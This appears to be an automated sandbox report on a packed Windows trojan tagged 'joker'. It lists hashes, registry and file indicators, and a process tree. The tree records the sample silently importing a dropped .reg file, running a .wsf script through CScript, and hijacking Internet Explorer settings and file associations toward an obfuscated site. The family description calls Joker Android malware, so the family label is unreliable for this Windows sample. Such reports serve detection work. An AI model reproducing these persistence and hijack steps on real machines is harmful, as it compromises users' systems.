joker | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8

Analysis

max time kernel
152s
max time network
174s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2022 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Size

31KB
MD5

d19fb816ef890f60e3540b406e7c3bf5
SHA1

6a359982daceb160e73334341e70d83e3796c421
SHA256

7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8
SHA512

c0ab0c0c8d1280e335576c38f86769b120e8368494f3369c1def895fbda7b29e26c59f90cd36d6c25a8070830c8debff9ffc18fece89a6eac614a9ac75ec8d69
SSDEEP

768:kocmTDD19oLGzXhvhLdXUi6ZBasRoxUMg:vPz5h9xRuBb2xUMg

Score

10^/10

joker infostealer trojan upx

Malware Config

Signatures

joker
Joker is an Android malware that targets billing and SMS fraud.
infostealer trojan joker

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4340-132-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral2/memory/4340-145-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral2/memory/4340-147-0x0000000000400000-0x0000000000429000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\tk.reg	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	C:\Windows\inf\yewnsemla.wzyxk	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File created	C:\Windows\inf\1_yewnsemla.wzyxk	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	C:\Windows\inf\pack.wsf	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	C:\Windows\inf\yewnsemla.wzyxk	Cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.5136688.com\ = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "756"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3080748286"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "189"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "504"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985263"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "693"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370360775"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "630"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30985263"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "252"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "693"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "252"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a10000000000200000000001066000000010000200000008908c2f3f1bc248b339e4f43869cd7f4e6268fd9c40950bcd143b96e689e4753000000000e8000000002000020000000b608be236d7cfa026cc484b332ab99c49e544b45f90ded96c0152faa52342fb3200000008e0194ec8fc1c8f9bbcbbd6d5843892e9a03fe302b57049fe28b189464ad5e2e40000000d9ef91b54bc029858370bfddff91e7d6131133c06a239f875cc70f56c6f41ec20991ccb93db2edcd608933722a0f28f5b16626ef68e8a0cde08c394125833658	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "504"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "441"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "567"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985263"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.5136688.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "252"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30985263"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3131373645"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "189"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "504"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\www.5136688.com\ = "63"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\5136688.com\Total = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "315"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "567"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv	IEXPLORE.EXE

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm"	WScript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1 h%t%t%p:%//%w%w%w.%15%11%13%16%16%18%18.%c%o%m/?8"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command\ = "WScript.exe \"C:\\Windows\\inf\\yewnsemla.wzyxk\" \"%1\""	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\Command\ = "C:\\Windows\\SysWow64\\CScript.exe \"%1\" %*"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command\ = "WScript.exe \"C:\\Windows\\inf\\yewnsemla.wzyxk\" \"%1\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\DefaultIcon	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc\ = "qcfile"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\FriendlyTypeName = "@%SystemRoot%\\System32\\wshext.dll,-4804"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\IconHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wzyxk	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "????"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4644	regedit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1860	iexplore.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1860	iexplore.exe
1860	iexplore.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
1860	iexplore.exe
1860	iexplore.exe
2632	IEXPLORE.EXE
2632	IEXPLORE.EXE
1860	iexplore.exe
1860	iexplore.exe
5080	IEXPLORE.EXE
5080	IEXPLORE.EXE
5080	IEXPLORE.EXE
5080	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4340 wrote to memory of 2220	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	80
PID 4340 wrote to memory of 2220	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	80
PID 4340 wrote to memory of 2220	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	80
PID 2220 wrote to memory of 4644	2220	cmd.exe	82
PID 2220 wrote to memory of 4644	2220	cmd.exe	82
PID 2220 wrote to memory of 4644	2220	cmd.exe	82
PID 4340 wrote to memory of 4264	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	84
PID 4340 wrote to memory of 4264	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	84
PID 4340 wrote to memory of 4264	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	84
PID 4264 wrote to memory of 3060	4264	Cmd.exe	86
PID 4264 wrote to memory of 3060	4264	Cmd.exe	86
PID 4264 wrote to memory of 3060	4264	Cmd.exe	86
PID 4340 wrote to memory of 4840	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	87
PID 4340 wrote to memory of 4840	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	87
PID 4340 wrote to memory of 4840	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	87
PID 4840 wrote to memory of 1860	4840	WScript.exe	88
PID 4840 wrote to memory of 1860	4840	WScript.exe	88
PID 1860 wrote to memory of 2632	1860	iexplore.exe	90
PID 1860 wrote to memory of 2632	1860	iexplore.exe	90
PID 1860 wrote to memory of 2632	1860	iexplore.exe	90
PID 4340 wrote to memory of 3692	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	94
PID 4340 wrote to memory of 3692	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	94
PID 4340 wrote to memory of 2804	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	95
PID 4340 wrote to memory of 2804	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	95
PID 4340 wrote to memory of 2804	4340	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	95
PID 1860 wrote to memory of 5080	1860	iexplore.exe	96
PID 1860 wrote to memory of 5080	1860	iexplore.exe	96
PID 1860 wrote to memory of 5080	1860	iexplore.exe	96

C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
"C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:4644
- C:\Windows\SysWOW64\Cmd.exe
  Cmd.exe /c CScript /nologo "C:\Windows\inf\pack.wsf" "C:\Windows\inf\1_yewnsemla.wzyxk" >> "C:\Windows\inf\yewnsemla.wzyxk"
  2⤵
  - Drops file in Windows directory
